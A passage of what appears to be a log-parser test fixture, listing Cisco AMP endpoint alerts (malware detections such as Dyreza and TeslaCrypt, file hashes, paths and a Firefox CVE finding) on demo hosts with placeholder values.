"host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 53873, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296279, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.cve": [ - "CVE-2015-7204" - ], - "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "cisco.amp.vulnerabilities": [ - { - "cve": "CVE-2015-7204", - "name": "Mozilla Firefox", - "score": "6.8", - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", - "version": "41.0" - } - ], - "event.action": "Vulnerable Application Detected", - "event.category": [ - "file" - ], - "event.dataset": "cisco.amp", - "event.id": 15210587194928, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 1, - "event.start": "2021-01-15T10:20:00.000Z", - "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", - "file.name": "firefox.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", - "input.type": "log", - "log.offset": 55192, - "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", - "related.hash": [ - "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" - ], - "related.hosts": [ - "Demo_AMP_Exploit_Prevention" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669409347600427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 257000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669409347600000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 56650, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669405052633129", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 847000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669405052633000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 59295, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669147354595368", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 375000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669147354595000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 60614, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669143059628070", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 968000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669143059628000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 63259, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259286289612895", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 669000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259286289613000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 64578, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:13.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259234750005342", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 657000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259234750005000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 65897, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259183210397789", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 645000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259183210398000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 67216, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "e1:e5:94:ea:a5:44" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6180335966167760897", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "e1:e5:94:ea:a5:44" - ], - "cisco.amp.timestamp_nanoseconds": 875000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6180335966167761000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", - "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", - "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "file.name": "Fax.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Upatre", - "host.name": "Demo_Upatre", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 68535, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "b2e15a06b0cca8a926c94f8a8eae3d88", - "f9b02ad8d25157eebdb284631ff646316dc606d5" - ], - "related.hosts": [ - "Demo_Upatre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668885361590309", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 672000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668885361590000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 70133, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259135965757532", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 8000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259135965757000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 74097, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 291000000, - "event.action": "Executed malware", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900291000600, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:17:41.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 75414, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251520740130915", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 3000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251520740131000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 76706, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251516445163618", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 988000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251516445164000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 78028, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251512150196266", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 942000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251512150196000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 152159, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": 